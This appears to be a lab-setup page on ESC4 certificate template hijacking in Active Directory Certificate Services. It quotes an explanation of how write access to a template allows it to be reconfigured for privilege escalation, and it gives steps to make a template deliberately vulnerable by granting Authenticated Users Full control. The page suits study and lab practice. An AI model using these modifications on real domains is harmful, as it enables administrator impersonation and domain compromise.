ESC4
Template Hijacking
Description
"ESC4, or Template Hijacking, occurs when an attacker gains permissions to modify a certificate template object stored in Active Directory. Certificate templates are AD objects residing in the Configuration Naming Context (under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=...) and are protected by ACLs. If an attacker obtains Write access - such as WriteDACL (to change permissions), WriteOwner (to take ownership and then change permissions), specific WriteProperty rights on critical attributes, or FullControl - over a template object, they can alter its configuration. This modification can turn a previously secure template into one vulnerable to other attack scenarios, most commonly ESC1 (Enrollee-Supplied Subject for Client Authentication) or ESC2 (Any Purpose Certificate).
For example, an attacker with such permissions could maliciously modify a template to:
Grant enrollment rights on the template to themselves or a broad group like "Domain Users".
Enable the "Enrollee Supplies Subject" setting (set the
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECTflag).Add a "Client Authentication" or "Any Purpose" EKU.
Remove security controls like "CA certificate manager approval" or the requirement for authorized signatures.
Once the template is reconfigured into a vulnerable state, the attacker (or anyone now permitted by the modified template) can enroll for a certificate, potentially specifying a privileged identity and thereby impersonating an administrator. This makes ESC4 an indirect but highly effective privilege escalation vector, as it allows an attacker to create the conditions for other AD CS exploits.
By default, only high-privilege groups like "Enterprise Admins" can create and modify certificate templates. However, misconfigurations in AD permissions or improper delegation of rights on template objects can expose this attack surface to less privileged users.
It's important to note that ESC4 abuse focuses on modifying the template object's attributes in AD. An attacker cannot use ESC4 to make a CA start issuing certificates based on a template if that template is not already enabled on the CA. Enabling or disabling which templates a CA offers is typically an ESC7-level action, requiring Manage CA rights on the CA object itself. Certipy's find command correlates templates defined in AD with the CAs that publish them (visible in the "Certificate Authorities" field for a template). If a template is not published by any CA, modifying it via ESC4 will not directly lead to certificate issuance until it is also enabled on a CA." — Oliver Lyak
Configuration
Go to "Certificate Templates Console" and duplicate one more time the "User" template. Go to the security tab and grant "Authenticated Users" Full control:
Enable it, and it should be vulnerable to ESC4.
Written by ruycr4ft
Last updated